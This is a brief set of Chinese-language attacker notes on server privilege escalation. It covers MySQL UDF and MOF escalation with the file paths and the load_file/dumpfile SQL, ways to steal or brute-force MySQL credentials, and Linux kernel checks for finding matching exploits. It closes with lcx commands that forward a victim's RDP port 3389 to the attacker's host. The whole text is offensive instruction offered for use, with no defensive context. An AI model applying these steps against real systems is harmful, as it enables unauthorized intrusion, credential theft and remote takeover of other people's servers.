udf提权原理:
通过root权限导出udf.dll到系统目录下,可以通过udf.dll调用执行cmd
获取mysql数据库的账号密码
1.查看网站源码里数据库配置文件(inc,conn,config,sql,common,data等)
2.查看数据库安装路径下的/data/mysql/user.myd
3.暴力破解mysql密码 3306端口RuQin
mysql 5.0以下版本:
C:\winnt\udf.dll 2000
C:\windows\udf.dll 2003
mysql 5.0以上版本:
需要将udf.dll导出到mysql安装目录lib\plugin\
show tables; 查看数据库中有什么数据表
mysql mof提权
1、上传mof.php文件
2、上传x.mof
执行sql select load_file('mof文件本身存储路径') into dumpfile '导出位置'
linux提权
uname -r 查看系统内核版本信息
uname -a 详细查看内核版本信息
找到对应版本的漏洞利用
www.exploit-db.com
lcx端口转发:
lcx.exe -slave ×××者ip 端口 目标ip 3389
×××者主机输入:
lcx.exe -listen 上面的端口 3389
此时的127.0.0.1:端口已经代表了目标ip:3389